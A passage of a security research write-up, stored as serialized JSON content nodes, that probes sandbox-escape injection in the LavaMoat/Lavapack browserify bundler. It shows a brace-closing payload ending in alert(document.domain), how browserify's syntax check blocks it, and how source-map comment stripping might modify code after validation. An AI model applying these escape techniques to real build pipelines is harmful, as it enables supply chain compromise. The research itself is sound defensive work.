{\n",{"type":24,"tag":301,"props":54759,"children":54760},{"class":303,"line":447},[54761],{"type":24,"tag":301,"props":54762,"children":54763},{"style":329},[54764],{"type":30,"value":54765}," 'use strict';\n",{"type":24,"tag":301,"props":54767,"children":54768},{"class":303,"line":476},[54769,54774,54778,54783],{"type":24,"tag":301,"props":54770,"children":54771},{"style":329},[54772],{"type":30,"value":54773}," // source: ",{"type":24,"tag":301,"props":54775,"children":54776},{"style":348},[54777],{"type":30,"value":40857},{"type":24,"tag":301,"props":54779,"children":54780},{"style":369},[54781],{"type":30,"value":54782},"filename",{"type":24,"tag":301,"props":54784,"children":54785},{"style":348},[54786],{"type":30,"value":698},{"type":24,"tag":301,"props":54788,"children":54789},{"class":303,"line":495},[54790],{"type":24,"tag":301,"props":54791,"children":54792},{"style":329},[54793],{"type":30,"value":54794}," return function (require, module, exports) {\n",{"type":24,"tag":301,"props":54796,"children":54797},{"class":303,"line":504},[54798],{"type":24,"tag":301,"props":54799,"children":54800},{"style":329},[54801],{"type":30,"value":54802}," __MODULE_CONTENT__\n",{"type":24,"tag":301,"props":54804,"children":54805},{"class":303,"line":512},[54806],{"type":24,"tag":301,"props":54807,"children":54808},{"style":329},[54809],{"type":30,"value":54810}," };\n",{"type":24,"tag":301,"props":54812,"children":54813},{"class":303,"line":592},[54814],{"type":24,"tag":301,"props":54815,"children":54816},{"style":329},[54817],{"type":30,"value":15515},{"type":24,"tag":301,"props":54819,"children":54820},{"class":303,"line":619},[54821],{"type":24,"tag":301,"props":54822,"children":54823},{"style":329},[54824],{"type":30,"value":3345},{"type":24,"tag":301,"props":54826,"children":54827},{"class":303,"line":635},[54828],{"type":24,"tag":301,"props":54829,"children":54830},{"style":329},[54831],{"type":30,"value":19459},{"type":24,"tag":301,"props":54833,"children":54834},{"class":303,"line":643},[54835],{"type":24,"tag":301,"props":54836,"children":54837},{"style":329},[54838],{"type":30,"value":54839}," }`\n",{"type":24,"tag":32,"props":54841,"children":54842},{},[54843,54845,54851,54853,54859],{"type":30,"value":54844},"Lavapack uses ",{"type":24,"tag":145,"props":54846,"children":54848},{"className":54847},[],[54849],{"type":30,"value":54850},"with()",{"type":30,"value":54852}," proxies to restrict the objects accessible by the module, and ",{"type":24,"tag":145,"props":54854,"children":54856},{"className":54855},[],[54857],{"type":30,"value":54858},"__MODULE_CONTENT__",{"type":30,"value":54860}," is replaced by the content of a file required by the project being built.",{"type":24,"tag":80,"props":54862,"children":54864},{"id":54863},"injection-not-so-simple",[54865],{"type":30,"value":54866},"Injection? Not So Simple",{"type":24,"tag":32,"props":54868,"children":54869},{},[54870,54872,54877],{"type":30,"value":54871},"We first tried to inject invalid javascript inside a javascript file, and then attempt to escape the ",{"type":24,"tag":145,"props":54873,"children":54875},{"className":54874},[],[54876],{"type":30,"value":19446},{"type":30,"value":54878}," environment:",{"type":24,"tag":291,"props":54880,"children":54882},{"className":38119,"code":54881,"language":38121,"meta":7,"style":7}," } // end function 1\n } // end function 2\n } // end with 1\n} // end with 2\n\nalert(document.domain)\n",[54883],{"type":24,"tag":145,"props":54884,"children":54885},{"__ignoreMap":7},[54886,54899,54911,54923,54935,54942],{"type":24,"tag":301,"props":54887,"children":54888},{"class":303,"line":304},[54889,54894],{"type":24,"tag":301,"props":54890,"children":54891},{"style":359},[54892],{"type":30,"value":54893}," } ",{"type":24,"tag":301,"props":54895,"children":54896},{"style":1062},[54897],{"type":30,"value":54898},"// end function 1\n",{"type":24,"tag":301,"props":54900,"children":54901},{"class":303,"line":320},[54902,54906],{"type":24,"tag":301,"props":54903,"children":54904},{"style":359},[54905],{"type":30,"value":38222},{"type":24,"tag":301,"props":54907,"children":54908},{"style":1062},[54909],{"type":30,"value":54910},"// end function 2\n",{"type":24,"tag":301,"props":54912,"children":54913},{"class":303,"line":335},[54914,54918],{"type":24,"tag":301,"props":54915,"children":54916},{"style":359},[54917],{"type":30,"value":42945},{"type":24,"tag":301,"props":54919,"children":54920},{"style":1062},[54921],{"type":30,"value":54922},"// end with 1\n",{"type":24,"tag":301,"props":54924,"children":54925},{"class":303,"line":344},[54926,54930],{"type":24,"tag":301,"props":54927,"children":54928},{"style":359},[54929],{"type":30,"value":53610},{"type":24,"tag":301,"props":54931,"children":54932},{"style":1062},[54933],{"type":30,"value":54934},"// end with 2\n",{"type":24,"tag":301,"props":54936,"children":54937},{"class":303,"line":401},[54938],{"type":24,"tag":301,"props":54939,"children":54940},{"emptyLinePlaceholder":16},[54941],{"type":30,"value":341},{"type":24,"tag":301,"props":54943,"children":54944},{"class":303,"line":415},[54945,54949,54953,54957,54961,54965],{"type":24,"tag":301,"props":54946,"children":54947},{"style":314},[54948],{"type":30,"value":39448},{"type":24,"tag":301,"props":54950,"children":54951},{"style":359},[54952],{"type":30,"value":362},{"type":24,"tag":301,"props":54954,"children":54955},{"style":369},[54956],{"type":30,"value":39458},{"type":24,"tag":301,"props":54958,"children":54959},{"style":359},[54960],{"type":30,"value":206},{"type":24,"tag":301,"props":54962,"children":54963},{"style":369},[54964],{"type":30,"value":39468},{"type":24,"tag":301,"props":54966,"children":54967},{"style":359},[54968],{"type":30,"value":791},{"type":24,"tag":32,"props":54970,"children":54971},{},[54972,54974,54980,54982,54989],{"type":30,"value":54973},"However, when we tried to bundle it, a ",{"type":24,"tag":145,"props":54975,"children":54977},{"className":54976},[],[54978],{"type":30,"value":54979},"ParseError",{"type":30,"value":54981}," was thrown. This is because Lavapack is a plugin of ",{"type":24,"tag":188,"props":54983,"children":54986},{"href":54984,"rel":54985},"https://github.com/browserify/browserify",[192],[54987],{"type":30,"value":54988},"browserify",{"type":30,"value":54990},", which has a syntax check before replacing the code.",{"type":24,"tag":32,"props":54992,"children":54993},{},[54994,54996,55002,55004,55010,55012,55018,55020,55025],{"type":30,"value":54995},"Looking deeper into browserify, we find it has a ",{"type":24,"tag":145,"props":54997,"children":54999},{"className":54998},[],[55000],{"type":30,"value":55001},"syntax",{"type":30,"value":55003}," stage on it's pipeline, and uses the ",{"type":24,"tag":145,"props":55005,"children":55007},{"className":55006},[],[55008],{"type":30,"value":55009},"syntax-error",{"type":30,"value":55011}," npm package to validate the syntax of each javascript file content. Since Lavapack replaces the ",{"type":24,"tag":145,"props":55013,"children":55015},{"className":55014},[],[55016],{"type":30,"value":55017},"pack",{"type":30,"value":55019}," stage on browserify pipeline, which comes after the ",{"type":24,"tag":145,"props":55021,"children":55023},{"className":55022},[],[55024],{"type":30,"value":55001},{"type":30,"value":55026},", it was not possible to inject invalid javascript to escape the Lavamoat sandbox.",{"type":24,"tag":32,"props":55028,"children":55029},{},[55030],{"type":24,"tag":177,"props":55031,"children":55034},{"alt":55032,"src":55033},"Pipeline","/posts/supply-chain-attacks-a-new-era/pipeline.png",[],{"type":24,"tag":32,"props":55036,"children":55037},{},[55038,55039,55044,55046,55051],{"type":30,"value":8079},{"type":24,"tag":145,"props":55040,"children":55042},{"className":55041},[],[55043],{"type":30,"value":55009},{"type":30,"value":55045}," package performs a syntax check by using ",{"type":24,"tag":145,"props":55047,"children":55049},{"className":55048},[],[55050],{"type":30,"value":44287},{"type":30,"value":55052}," with function hoisting:",{"type":24,"tag":291,"props":55054,"children":55056},{"className":38119,"code":55055,"language":38121,"meta":7,"style":7},"try {\n eval('throw \"STOP\"; (function () { ' + src + '\\n})()');\n return;\n}\ncatch (err) {\n if (err === 'STOP') return undefined;\n if (err.constructor.name !== 'SyntaxError') return err;\n return errorInfo(src, file, opts);\n}\n",[55057],{"type":24,"tag":145,"props":55058,"children":55059},{"__ignoreMap":7},[55060,55072,55121,55132,55139,55160,55200,55260,55301],{"type":24,"tag":301,"props":55061,"children":55062},{"class":303,"line":304},[55063,55068],{"type":24,"tag":301,"props":55064,"children":55065},{"style":308},[55066],{"type":30,"value":55067},"try",{"type":24,"tag":301,"props":55069,"children":55070},{"style":359},[55071],{"type":30,"value":3035},{"type":24,"tag":301,"props":55073,"children":55074},{"class":303,"line":320},[55075,55080,55084,55089,55093,55098,55102,55107,55112,55117],{"type":24,"tag":301,"props":55076,"children":55077},{"style":314},[55078],{"type":30,"value":55079}," eval",{"type":24,"tag":301,"props":55081,"children":55082},{"style":359},[55083],{"type":30,"value":362},{"type":24,"tag":301,"props":55085,"children":55086},{"style":329},[55087],{"type":30,"value":55088},"'throw \"STOP\"; (function () { '",{"type":24,"tag":301,"props":55090,"children":55091},{"style":385},[55092],{"type":30,"value":957},{"type":24,"tag":301,"props":55094,"children":55095},{"style":369},[55096],{"type":30,"value":55097}," src",{"type":24,"tag":301,"props":55099,"children":55100},{"style":385},[55101],{"type":30,"value":957},{"type":24,"tag":301,"props":55103,"children":55104},{"style":329},[55105],{"type":30,"value":55106}," '",{"type":24,"tag":301,"props":55108,"children":55109},{"style":9400},[55110],{"type":30,"value":55111},"\\n",{"type":24,"tag":301,"props":55113,"children":55114},{"style":329},[55115],{"type":30,"value":55116},"})()'",{"type":24,"tag":301,"props":55118,"children":55119},{"style":359},[55120],{"type":30,"value":589},{"type":24,"tag":301,"props":55122,"children":55123},{"class":303,"line":335},[55124,55128],{"type":24,"tag":301,"props":55125,"children":55126},{"style":308},[55127],{"type":30,"value":680},{"type":24,"tag":301,"props":55129,"children":55130},{"style":359},[55131],{"type":30,"value":492},{"type":24,"tag":301,"props":55133,"children":55134},{"class":303,"line":344},[55135],{"type":24,"tag":301,"props":55136,"children":55137},{"style":359},[55138],{"type":30,"value":698},{"type":24,"tag":301,"props":55140,"children":55141},{"class":303,"line":401},[55142,55147,55151,55156],{"type":24,"tag":301,"props":55143,"children":55144},{"style":308},[55145],{"type":30,"value":55146},"catch",{"type":24,"tag":301,"props":55148,"children":55149},{"style":359},[55150],{"type":30,"value":873},{"type":24,"tag":301,"props":55152,"children":55153},{"style":369},[55154],{"type":30,"value":55155},"err",{"type":24,"tag":301,"props":55157,"children":55158},{"style":359},[55159],{"type":30,"value":398},{"type":24,"tag":301,"props":55161,"children":55162},{"class":303,"line":415},[55163,55167,55171,55175,55179,55184,55188,55192,55196],{"type":24,"tag":301,"props":55164,"children":55165},{"style":308},[55166],{"type":30,"value":453},{"type":24,"tag":301,"props":55168,"children":55169},{"style":359},[55170],{"type":30,"value":873},{"type":24,"tag":301,"props":55172,"children":55173},{"style":369},[55174],{"type":30,"value":55155},{"type":24,"tag":301,"props":55176,"children":55177},{"style":385},[55178],{"type":30,"value":38177},{"type":24,"tag":301,"props":55180,"children":55181},{"style":329},[55182],{"type":30,"value":55183}," 'STOP'",{"type":24,"tag":301,"props":55185,"children":55186},{"style":359},[55187],{"type":30,"value":911},{"type":24,"tag":301,"props":55189,"children":55190},{"style":308},[55191],{"type":30,"value":916},{"type":24,"tag":301,"props":55193,"children":55194},{"style":348},[55195],{"type":30,"value":3515},{"type":24,"tag":301,"props":55197,"children":55198},{"style":359},[55199],{"type":30,"value":492},{"type":24,"tag":301,"props":55201,"children":55202},{"class":303,"line":439},[55203,55207,55211,55215,55219,55224,55228,55233,55238,55243,55247,55251,55256],{"type":24,"tag":301,"props":55204,"children":55205},{"style":308},[55206],{"type":30,"value":453},{"type":24,"tag":301,"props":55208,"children":55209},{"style":359},[55210],{"type":30,"value":873},{"type":24,"tag":301,"props":55212,"children":55213},{"style":369},[55214],{"type":30,"value":55155},{"type":24,"tag":301,"props":55216,"children":55217},{"style":359},[55218],{"type":30,"value":206},{"type":24,"tag":301,"props":55220,"children":55221},{"style":369},[55222],{"type":30,"value":55223},"constructor",{"type":24,"tag":301,"props":55225,"children":55226},{"style":359},[55227],{"type":30,"value":206},{"type":24,"tag":301,"props":55229,"children":55230},{"style":369},[55231],{"type":30,"value":55232},"name",{"type":24,"tag":301,"props":55234,"children":55235},{"style":385},[55236],{"type":30,"value":55237}," !==",{"type":24,"tag":301,"props":55239,"children":55240},{"style":329},[55241],{"type":30,"value":55242}," 'SyntaxError'",{"type":24,"tag":301,"props":55244,"children":55245},{"style":359},[55246],{"type":30,"value":911},{"type":24,"tag":301,"props":55248,"children":55249},{"style":308},[55250],{"type":30,"value":916},{"type":24,"tag":301,"props":55252,"children":55253},{"style":369},[55254],{"type":30,"value":55255}," err",{"type":24,"tag":301,"props":55257,"children":55258},{"style":359},[55259],{"type":30,"value":492},{"type":24,"tag":301,"props":55261,"children":55262},{"class":303,"line":447},[55263,55267,55272,55276,55280,55284,55288,55292,55297],{"type":24,"tag":301,"props":55264,"children":55265},{"style":308},[55266],{"type":30,"value":680},{"type":24,"tag":301,"props":55268,"children":55269},{"style":314},[55270],{"type":30,"value":55271}," errorInfo",{"type":24,"tag":301,"props":55273,"children":55274},{"style":359},[55275],{"type":30,"value":362},{"type":24,"tag":301,"props":55277,"children":55278},{"style":369},[55279],{"type":30,"value":39420},{"type":24,"tag":301,"props":55281,"children":55282},{"style":359},[55283],{"type":30,"value":377},{"type":24,"tag":301,"props":55285,"children":55286},{"style":369},[55287],{"type":30,"value":54680},{"type":24,"tag":301,"props":55289,"children":55290},{"style":359},[55291],{"type":30,"value":377},{"type":24,"tag":301,"props":55293,"children":55294},{"style":369},[55295],{"type":30,"value":55296},"opts",{"type":24,"tag":301,"props":55298,"children":55299},{"style":359},[55300],{"type":30,"value":589},{"type":24,"tag":301,"props":55302,"children":55303},{"class":303,"line":476},[55304],{"type":24,"tag":301,"props":55305,"children":55306},{"style":359},[55307],{"type":30,"value":698},{"type":24,"tag":32,"props":55309,"children":55310},{},[55311,55313,55317,55319,55325,55327,55332],{"type":30,"value":55312},"Interestingly, it ",{"type":24,"tag":5422,"props":55314,"children":55315},{},[55316],{"type":30,"value":10798},{"type":30,"value":55318}," possible to inject a ",{"type":24,"tag":145,"props":55320,"children":55322},{"className":55321},[],[55323],{"type":30,"value":55324},"}); (() => {",{"type":30,"value":55326}," inside source, and will not throw a syntax error. Unfortunately, this is not enough to bypass the ",{"type":24,"tag":145,"props":55328,"children":55330},{"className":55329},[],[55331],{"type":30,"value":54850},{"type":30,"value":55333}," sandbox of Lavapack.",{"type":24,"tag":80,"props":55335,"children":55337},{"id":55336},"sourcemap-the-syntax-killer",[55338],{"type":30,"value":55339},"SourceMap: The Syntax Killer",{"type":24,"tag":32,"props":55341,"children":55342},{},[55343,55345,55352],{"type":30,"value":55344},"Lavapack has a feature to extract source maps files from the code using ",{"type":24,"tag":188,"props":55346,"children":55349},{"href":55347,"rel":55348},"https://www.npmjs.com/package/convert-source-map",[192],[55350],{"type":30,"value":55351},"convert-source-map",{"type":30,"value":55353}," npm package:",{"type":24,"tag":291,"props":55355,"children":55357},{"className":38119,"code":55356,"language":38121,"meta":7,"style":7},"function extractSourceMaps(sourceCode) {\n const converter = convertSourceMap.fromSource(sourceCode)\n // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n const maps = converter && converter.toObject()\n const code = convertSourceMap.removeComments(sourceCode)\n return { code, maps }\n}\n",[55358],{"type":24,"tag":145,"props":55359,"children":55360},{"__ignoreMap":7},[55361,55385,55427,55435,55476,55517,55545],{"type":24,"tag":301,"props":55362,"children":55363},{"class":303,"line":304},[55364,55368,55373,55377,55381],{"type":24,"tag":301,"props":55365,"children":55366},{"style":348},[55367],{"type":30,"value":3205},{"type":24,"tag":301,"props":55369,"children":55370},{"style":314},[55371],{"type":30,"value":55372}," extractSourceMaps",{"type":24,"tag":301,"props":55374,"children":55375},{"style":359},[55376],{"type":30,"value":362},{"type":24,"tag":301,"props":55378,"children":55379},{"style":369},[55380],{"type":30,"value":44753},{"type":24,"tag":301,"props":55382,"children":55383},{"style":359},[55384],{"type":30,"value":398},{"type":24,"tag":301,"props":55386,"children":55387},{"class":303,"line":320},[55388,55392,55397,55401,55406,55410,55415,55419,55423],{"type":24,"tag":301,"props":55389,"children":55390},{"style":348},[55391],{"type":30,"value":42931},{"type":24,"tag":301,"props":55393,"children":55394},{"style":369},[55395],{"type":30,"value":55396}," converter",{"type":24,"tag":301,"props":55398,"children":55399},{"style":385},[55400],{"type":30,"value":2537},{"type":24,"tag":301,"props":55402,"children":55403},{"style":369},[55404],{"type":30,"value":55405}," convertSourceMap",{"type":24,"tag":301,"props":55407,"children":55408},{"style":359},[55409],{"type":30,"value":206},{"type":24,"tag":301,"props":55411,"children":55412},{"style":314},[55413],{"type":30,"value":55414},"fromSource",{"type":24,"tag":301,"props":55416,"children":55417},{"style":359},[55418],{"type":30,"value":362},{"type":24,"tag":301,"props":55420,"children":55421},{"style":369},[55422],{"type":30,"value":44753},{"type":24,"tag":301,"props":55424,"children":55425},{"style":359},[55426],{"type":30,"value":791},{"type":24,"tag":301,"props":55428,"children":55429},{"class":303,"line":335},[55430],{"type":24,"tag":301,"props":55431,"children":55432},{"style":1062},[55433],{"type":30,"value":55434}," // if (!converter) throw new Error('Unable to find original inlined sourcemap')\n",{"type":24,"tag":301,"props":55436,"children":55437},{"class":303,"line":344},[55438,55442,55447,55451,55455,55459,55463,55467,55472],{"type":24,"tag":301,"props":55439,"children":55440},{"style":348},[55441],{"type":30,"value":42931},{"type":24,"tag":301,"props":55443,"children":55444},{"style":369},[55445],{"type":30,"value":55446}," maps",{"type":24,"tag":301,"props":55448,"children":55449},{"style":385},[55450],{"type":30,"value":2537},{"type":24,"tag":301,"props":55452,"children":55453},{"style":369},[55454],{"type":30,"value":55396},{"type":24,"tag":301,"props":55456,"children":55457},{"style":385},[55458],{"type":30,"value":20977},{"type":24,"tag":301,"props":55460,"children":55461},{"style":369},[55462],{"type":30,"value":55396},{"type":24,"tag":301,"props":55464,"children":55465},{"style":359},[55466],{"type":30,"value":206},{"type":24,"tag":301,"props":55468,"children":55469},{"style":314},[55470],{"type":30,"value":55471},"toObject",{"type":24,"tag":301,"props":55473,"children":55474},{"style":359},[55475],{"type":30,"value":14551},{"type":24,"tag":301,"props":55477,"children":55478},{"class":303,"line":401},[55479,55483,55488,55492,55496,55500,55505,55509,55513],{"type":24,"tag":301,"props":55480,"children":55481},{"style":348},[55482],{"type":30,"value":42931},{"type":24,"tag":301,"props":55484,"children":55485},{"style":369},[55486],{"type":30,"value":55487}," code",{"type":24,"tag":301,"props":55489,"children":55490},{"style":385},[55491],{"type":30,"value":2537},{"type":24,"tag":301,"props":55493,"children":55494},{"style":369},[55495],{"type":30,"value":55405},{"type":24,"tag":301,"props":55497,"children":55498},{"style":359},[55499],{"type":30,"value":206},{"type":24,"tag":301,"props":55501,"children":55502},{"style":314},[55503],{"type":30,"value":55504},"removeComments",{"type":24,"tag":301,"props":55506,"children":55507},{"style":359},[55508],{"type":30,"value":362},{"type":24,"tag":301,"props":55510,"children":55511},{"style":369},[55512],{"type":30,"value":44753},{"type":24,"tag":301,"props":55514,"children":55515},{"style":359},[55516],{"type":30,"value":791},{"type":24,"tag":301,"props":55518,"children":55519},{"class":303,"line":415},[55520,55524,55528,55532,55536,55541],{"type":24,"tag":301,"props":55521,"children":55522},{"style":308},[55523],{"type":30,"value":45936},{"type":24,"tag":301,"props":55525,"children":55526},{"style":359},[55527],{"type":30,"value":16392},{"type":24,"tag":301,"props":55529,"children":55530},{"style":369},[55531],{"type":30,"value":145},{"type":24,"tag":301,"props":55533,"children":55534},{"style":359},[55535],{"type":30,"value":377},{"type":24,"tag":301,"props":55537,"children":55538},{"style":369},[55539],{"type":30,"value":55540},"maps",{"type":24,"tag":301,"props":55542,"children":55543},{"style":359},[55544],{"type":30,"value":16401},{"type":24,"tag":301,"props":55546,"children":55547},{"class":303,"line":439},[55548],{"type":24,"tag":301,"props":55549,"children":55550},{"style":359},[55551],{"type":30,"value":698},{"type":24,"tag":32,"props":55553,"children":55554},{},[55555,55557,55562,55564,55569],{"type":30,"value":55556},"This code removes the source map comments of the source code, meaning that there actually is a modification of source code in Lavapack after the ",{"type":24,"tag":145,"props":55558,"children":55560},{"className":55559},[],[55561],{"type":30,"value":55001},{"type":30,"value":55563}," stage. Reviewing the ",{"type":24,"tag":145,"props":55565,"children":55567},{"className":55566},[],[55568],{"type":30,"value":55351},{"type":30,"value":55570}," code, we can see exactly how this happens.",{"type":24,"tag":291,"props":55572,"children":55574},{"className":38119,"code":55573,"language":38121,"meta":7,"style":7},"Object.defineProperty(exports, 'commentRegex', {\n get: function getCommentRegex () {\n // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n return /^\\s*?\\/[\\/\\*][@#]\\s+?sourceMappingURL=data:(((?:application|text)\\/json)(?:;charset=([^;,]+?)?)?)?(?:;(base64))?,(.*?)$/mg;\n }\n});\n\nexports.removeComments = function (src) {\n return src.replace(exports.commentRegex, '');\n};\n",[55575],{"type":24,"tag":145,"props":55576,"children":55577},{"__ignoreMap":7},[55578,55616,55642,55650,55862,55869,55876,55883,55918,55968],{"type":24,"tag":301,"props":55579,"children":55580},{"class":303,"line":304},[55581,55586,55590,55595,55599,55603,55607,55612],{"type":24,"tag":301,"props":55582,"children":55583},{"style":369},[55584],{"type":30,"value":55585},"Object",{"type":24,"tag":301,"props":55587,"children":55588},{"style":359},[55589],{"type":30,"value":206},{"type":24,"tag":301,"props":55591,"children":55592},{"style":314},[55593],{"type":30,"value":55594},"defineProperty",{"type":24,"tag":301,"props":55596,"children":55597},{"style":359},[55598],{"type":30,"value":362},{"type":24,"tag":301,"props":55600,"children":55601},{"style":10246},[55602],{"type":30,"value":44625},{"type":24,"tag":301,"props":55604,"children":55605},{"style":359},[55606],{"type":30,"value":377},{"type":24,"tag":301,"props":55608,"children":55609},{"style":329},[55610],{"type":30,"value":55611},"'commentRegex'",{"type":24,"tag":301,"props":55613,"children":55614},{"style":359},[55615],{"type":30,"value":4190},{"type":24,"tag":301,"props":55617,"children":55618},{"class":303,"line":320},[55619,55624,55628,55632,55637],{"type":24,"tag":301,"props":55620,"children":55621},{"style":314},[55622],{"type":30,"value":55623}," get",{"type":24,"tag":301,"props":55625,"children":55626},{"style":369},[55627],{"type":30,"value":1679},{"type":24,"tag":301,"props":55629,"children":55630},{"style":348},[55631],{"type":30,"value":44953},{"type":24,"tag":301,"props":55633,"children":55634},{"style":314},[55635],{"type":30,"value":55636}," getCommentRegex",{"type":24,"tag":301,"props":55638,"children":55639},{"style":359},[55640],{"type":30,"value":55641}," () {\n",{"type":24,"tag":301,"props":55643,"children":55644},{"class":303,"line":335},[55645],{"type":24,"tag":301,"props":55646,"children":55647},{"style":1062},[55648],{"type":30,"value":55649}," // Groups: 1: media type, 2: MIME type, 3: charset, 4: encoding, 5: data.\n",{"type":24,"tag":301,"props":55651,"children":55652},{"class":303,"line":344},[55653,55657,55663,55668,55673,55678,55682,55687,55691,55696,55700,55704,55709,55714,55719,55724,55728,55732,55736,55741,55745,55750,55755,55760,55765,55769,55773,55777,55781,55785,55789,55793,55797,55802,55806,55810,55815,55820,55824,55828,55832,55836,55841,55845,55849,55853,55858],{"type":24,"tag":301,"props":55654,"children":55655},{"style":308},[55656],{"type":30,"value":680},{"type":24,"tag":301,"props":55658,"children":55660},{"style":55659},"--shiki-default:#D16969",[55661],{"type":30,"value":55662}," /",{"type":24,"tag":301,"props":55664,"children":55665},{"style":314},[55666],{"type":30,"value":55667},"^",{"type":24,"tag":301,"props":55669,"children":55670},{"style":55659},[55671],{"type":30,"value":55672},"\\s",{"type":24,"tag":301,"props":55674,"children":55675},{"style":9400},[55676],{"type":30,"value":55677},"*?\\/",{"type":24,"tag":301,"props":55679,"children":55680},{"style":329},[55681],{"type":30,"value":541},{"type":24,"tag":301,"props":55683,"children":55684},{"style":9400},[55685],{"type":30,"value":55686},"\\/\\*",{"type":24,"tag":301,"props":55688,"children":55689},{"style":329},[55690],{"type":30,"value":1756},{"type":24,"tag":301,"props":55692,"children":55693},{"style":55659},[55694],{"type":30,"value":55695},"@#",{"type":24,"tag":301,"props":55697,"children":55698},{"style":329},[55699],{"type":30,"value":22200},{"type":24,"tag":301,"props":55701,"children":55702},{"style":55659},[55703],{"type":30,"value":55672},{"type":24,"tag":301,"props":55705,"children":55706},{"style":9400},[55707],{"type":30,"value":55708},"+?",{"type":24,"tag":301,"props":55710,"children":55711},{"style":55659},[55712],{"type":30,"value":55713},"sourceMappingURL=data:",{"type":24,"tag":301,"props":55715,"children":55716},{"style":329},[55717],{"type":30,"value":55718},"(((?:",{"type":24,"tag":301,"props":55720,"children":55721},{"style":55659},[55722],{"type":30,"value":55723},"application",{"type":24,"tag":301,"props":55725,"children":55726},{"style":314},[55727],{"type":30,"value":17220},{"type":24,"tag":301,"props":55729,"children":55730},{"style":55659},[55731],{"type":30,"value":30},{"type":24,"tag":301,"props":55733,"children":55734},{"style":329},[55735],{"type":30,"value":9961},{"type":24,"tag":301,"props":55737,"children":55738},{"style":9400},[55739],{"type":30,"value":55740},"\\/",{"type":24,"tag":301,"props":55742,"children":55743},{"style":55659},[55744],{"type":30,"value":6680},{"type":24,"tag":301,"props":55746,"children":55747},{"style":329},[55748],{"type":30,"value":55749},")(?:",{"type":24,"tag":301,"props":55751,"children":55752},{"style":55659},[55753],{"type":30,"value":55754},";charset=",{"type":24,"tag":301,"props":55756,"children":55757},{"style":329},[55758],{"type":30,"value":55759},"([^",{"type":24,"tag":301,"props":55761,"children":55762},{"style":55659},[55763],{"type":30,"value":55764},";,",{"type":24,"tag":301,"props":55766,"children":55767},{"style":329},[55768],{"type":30,"value":22200},{"type":24,"tag":301,"props":55770,"children":55771},{"style":9400},[55772],{"type":30,"value":55708},{"type":24,"tag":301,"props":55774,"children":55775},{"style":329},[55776],{"type":30,"value":9961},{"type":24,"tag":301,"props":55778,"children":55779},{"style":9400},[55780],{"type":30,"value":2003},{"type":24,"tag":301,"props":55782,"children":55783},{"style":329},[55784],{"type":30,"value":9961},{"type":24,"tag":301,"props":55786,"children":55787},{"style":9400},[55788],{"type":30,"value":2003},{"type":24,"tag":301,"props":55790,"children":55791},{"style":329},[55792],{"type":30,"value":9961},{"type":24,"tag":301,"props":55794,"children":55795},{"style":9400},[55796],{"type":30,"value":2003},{"type":24,"tag":301,"props":55798,"children":55799},{"style":329},[55800],{"type":30,"value":55801},"(?:",{"type":24,"tag":301,"props":55803,"children":55804},{"style":55659},[55805],{"type":30,"value":1059},{"type":24,"tag":301,"props":55807,"children":55808},{"style":329},[55809],{"type":30,"value":362},{"type":24,"tag":301,"props":55811,"children":55812},{"style":55659},[55813],{"type":30,"value":55814},"base64",{"type":24,"tag":301,"props":55816,"children":55817},{"style":329},[55818],{"type":30,"value":55819},"))",{"type":24,"tag":301,"props":55821,"children":55822},{"style":9400},[55823],{"type":30,"value":2003},{"type":24,"tag":301,"props":55825,"children":55826},{"style":55659},[55827],{"type":30,"value":10949},{"type":24,"tag":301,"props":55829,"children":55830},{"style":329},[55831],{"type":30,"value":362},{"type":24,"tag":301,"props":55833,"children":55834},{"style":55659},[55835],{"type":30,"value":206},{"type":24,"tag":301,"props":55837,"children":55838},{"style":9400},[55839],{"type":30,"value":55840},"*?",{"type":24,"tag":301,"props":55842,"children":55843},{"style":329},[55844],{"type":30,"value":9961},{"type":24,"tag":301,"props":55846,"children":55847},{"style":314},[55848],{"type":30,"value":17093},{"type":24,"tag":301,"props":55850,"children":55851},{"style":55659},[55852],{"type":30,"value":1036},{"type":24,"tag":301,"props":55854,"children":55855},{"style":348},[55856],{"type":30,"value":55857},"mg",{"type":24,"tag":301,"props":55859,"children":55860},{"style":359},[55861],{"type":30,"value":492},{"type":24,"tag":301,"props":55863,"children":55864},{"class":303,"line":401},[55865],{"type":24,"tag":301,"props":55866,"children":55867},{"style":359},[55868],{"type":30,"value":6918},{"type":24,"tag":301,"props":55870,"children":55871},{"class":303,"line":415},[55872],{"type":24,"tag":301,"props":55873,"children":55874},{"style":359},[55875],{"type":30,"value":4868},{"type":24,"tag":301,"props":55877,"children":55878},{"class":303,"line":439},[55879],{"type":24,"tag":301,"props":55880,"children":55881},{"emptyLinePlaceholder":16},[55882],{"type":30,"value":341},{"type":24,"tag":301,"props":55884,"children":55885},{"class":303,"line":447},[55886,55890,55894,55898,55902,55906,55910,55914],{"type":24,"tag":301,"props":55887,"children":55888},{"style":10246},[55889],{"type":30,"value":44625},{"type":24,"tag":301,"props":55891,"children":55892},{"style":359},[55893],{"type":30,"value":206},{"type":24,"tag":301,"props":55895,"children":55896},{"style":314},[55897],{"type":30,"value":55504},{"type":24,"tag":301,"props":55899,"children":55900},{"style":385},[55901],{"type":30,"value":2537},{"type":24,"tag":301,"props":55903,"children":55904},{"style":348},[55905],{"type":30,"value":44953},{"type":24,"tag":301,"props":55907,"children":55908},{"style":359},[55909],{"type":30,"value":873},{"type":24,"tag":301,"props":55911,"children":55912},{"style":369},[55913],{"type":30,"value":39420},{"type":24,"tag":301,"props":55915,"children":55916},{"style":359},[55917],{"type":30,"value":398},{"type":24,"tag":301,"props":55919,"children":55920},{"class":303,"line":476},[55921,55925,55929,55933,55938,55942,55946,55950,55955,55959,55964],{"type":24,"tag":301,"props":55922,"children":55923},{"style":308},[55924],{"type":30,"value":45936},{"type":24,"tag":301,"props":55926,"children":55927},{"style":369},[55928],{"type":30,"value":55097},{"type":24,"tag":301,"props":55930,"children":55931},{"style":359},[55932],{"type":30,"value":206},{"type":24,"tag":301,"props":55934,"children":55935},{"style":314},[55936],{"type":30,"value":55937},"replace",{"type":24,"tag":301,"props":55939,"children":55940},{"style":359},[55941],{"type":30,"value":362},{"type":24,"tag":301,"props":55943,"children":55944},{"style":10246},[55945],{"type":30,"value":44625},{"type":24,"tag":301,"props":55947,"children":55948},{"style":359},[55949],{"type":30,"value":206},{"type":24,"tag":301,"props":55951,"children":55952},{"style":369},[55953],{"type":30,"value":55954},"commentRegex",{"type":24,"tag":301,"props":55956,"children":55957},{"style":359},[55958],{"type":30,"value":377},{"type":24,"tag":301,"props":55960,"children":55961},{"style":329},[55962],{"type":30,"value":55963},"''",{"type":24,"tag":301,"props":55965,"